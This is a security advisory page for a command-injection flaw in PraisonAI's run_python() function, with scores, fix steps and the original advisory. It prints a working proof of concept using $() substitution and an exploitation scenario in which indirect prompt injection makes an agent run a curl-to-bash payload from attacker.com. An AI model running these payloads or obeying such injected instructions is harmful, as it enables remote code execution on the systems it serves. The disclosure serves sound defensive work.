CVE-2026-34937: PraisonAI: OS command injection via run_python() shell escape

GHSA-w37c-qqfp-c67f HIGH CISA: ATTEND
Published April 1, 2026
CISO Take

Any PraisonAI agent pipeline that passes user or task-supplied content to run_python() is exposed to full OS command execution. Critically, the auto-generated Flask server ships with AUTH_ENABLED=False by default, turning this local-classified CVE into a remotely exploitable condition via indirect prompt injection. Update to praisonaiagents >= 1.5.90 immediately and audit any deployment of the built-in Flask server for unauthenticated exposure.

What is the risk?

Rated CVSS 7.8 (Local), but effective exploitability is higher in AI agent deployments. The $() shell substitution bypass is trivially reproducible and the PoC is public. The default unauthenticated Flask server converts the attack vector from Local to Network-reachable. AI agent pipelines processing external or user-supplied data are especially exposed since indirect prompt injection can deliver the payload without direct system access. Exploitability is HIGH in agentic and multi-turn workflow contexts.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
PraisonAI Agents pip <= 1.5.89 1.5.90
11 dependents 69% patched ~0d to patch Full package profile →

Do you use PraisonAI Agents? You're affected.

How severe is it?

CVSS 3.1
7.8 / 10
EPSS
0.5%
chance of exploitation in 30 days
Higher than 42% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Local
AC Low
PR Low
UI None
S Unchanged
C High
I High
A High

What should I do?

7 steps
  1. PATCH

    Upgrade praisonaiagents to >= 1.5.90 immediately.

  2. If patching is blocked, disable or restrict run_python() from accepting externally-sourced input via code review and input validation gates.

  3. Set AUTH_ENABLED=True or add network-level controls (firewall rules, mTLS) to any exposed PraisonAI Flask server.

  4. Run the agent process under a least-privilege service account to contain blast radius.

  5. DETECT

    Alert on subprocess spawning from Python agent processes, especially child processes with unexpected network connections or file writes to /tmp.

  6. Audit all PraisonAI deployments for shell=True usage with unsanitized inputs.

  7. Add $() and backtick characters to input sanitization blocklists as a defense-in-depth measure.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
6.1.2 - AI risk assessment 8.4 - AI system security
NIST AI RMF
GOVERN-1.7 - Processes for AI risk management MANAGE-2.4 - Residual risks are managed
OWASP LLM Top 10
LLM01 - Prompt Injection LLM05 - Improper Output Handling LLM06 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-34937?

Any PraisonAI agent pipeline that passes user or task-supplied content to run_python() is exposed to full OS command execution. Critically, the auto-generated Flask server ships with AUTH_ENABLED=False by default, turning this local-classified CVE into a remotely exploitable condition via indirect prompt injection. Update to praisonaiagents >= 1.5.90 immediately and audit any deployment of the built-in Flask server for unauthenticated exposure.

Is CVE-2026-34937 actively exploited?

No confirmed active exploitation of CVE-2026-34937 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34937?

1. PATCH: Upgrade praisonaiagents to >= 1.5.90 immediately. 2. If patching is blocked, disable or restrict run_python() from accepting externally-sourced input via code review and input validation gates. 3. Set AUTH_ENABLED=True or add network-level controls (firewall rules, mTLS) to any exposed PraisonAI Flask server. 4. Run the agent process under a least-privilege service account to contain blast radius. 5. DETECT: Alert on subprocess spawning from Python agent processes, especially child processes with unexpected network connections or file writes to /tmp. 6. Audit all PraisonAI deployments for shell=True usage with unsanitized inputs. 7. Add $() and backtick characters to input sanitization blocklists as a defense-in-depth measure.

What systems are affected by CVE-2026-34937?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, code execution sandboxes, multi-agent orchestration, agentic task planners, model serving with code tools.

What is the CVSS score for CVE-2026-34937?

CVE-2026-34937 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.55%.

What is the AI security impact?

Affected AI Architectures

agent frameworkscode execution sandboxesmulti-agent orchestrationagentic task plannersmodel serving with code tools

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0051.001 Indirect
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: 6.1.2, 8.4
NIST AI RMF: GOVERN-1.7, MANAGE-2.4
OWASP LLM Top 10: LLM01, LLM05, LLM06

What are the technical details?

Original Advisory

### Summary `run_python()` in `praisonai` constructs a shell command string by interpolating user-controlled code into `python3 -c "<code>"` and passing it to `subprocess.run(..., shell=True)`. The escaping logic only handles `\` and `"`, leaving `$()` and backtick substitutions unescaped, allowing arbitrary OS command execution before Python is invoked. ### Details `execute_command.py:290` (source) -> `execute_command.py:297` (hop) -> `execute_command.py:310` (sink) ```python # source -- user-controlled code argument def run_python(code: str, cwd=None, timeout=60): # hop -- incomplete escaping, $ and () not handled escaped_code = code.replace('\\', '\\\\').replace('"', '\\"') command = f'{python_cmd} -c "{escaped_code}"' # sink -- shell=True expands $() before python3 runs return execute_command(command=command, cwd=cwd, timeout=timeout) # execute_command calls subprocess.run(command, shell=True, ...) ``` ### PoC ```python # tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30) # install: pip install -e src/praisonai import sys sys.path.insert(0, 'src/praisonai') from praisonai.code.tools.execute_command import run_python result = run_python(code='$(id > /tmp/injected)') print(result) # verify import subprocess print(subprocess.run(['cat', '/tmp/injected'], capture_output=True, text=True).stdout) # expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)... ``` ### Impact Any agent pipeline or API consumer that passes user or task-supplied content to `run_python()` is exposed to full OS command execution as the process user. The function is reachable via indirect prompt injection and the auto-generated Flask server deploys with `AUTH_ENABLED = False` by default when no token is configured.

Exploitation Scenario

An adversary crafts a malicious document or web page that an AI research agent is directed to process. The document contains an indirect prompt injection payload instructing the agent to execute: run_python(code='$(curl http://attacker.com/payload.sh | bash)'). When the agent calls run_python() with this string, the incomplete escaping fails to strip $(), the shell expands the substitution before Python is invoked, and the attacker's payload executes with the agent process's OS privileges. On an unauthenticated Flask deployment, the adversary can also POST directly to the code execution endpoint without any prompt injection, reducing the attack to a simple HTTP request.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
April 1, 2026
Last Modified
April 1, 2026
First Seen
April 2, 2026

Related Vulnerabilities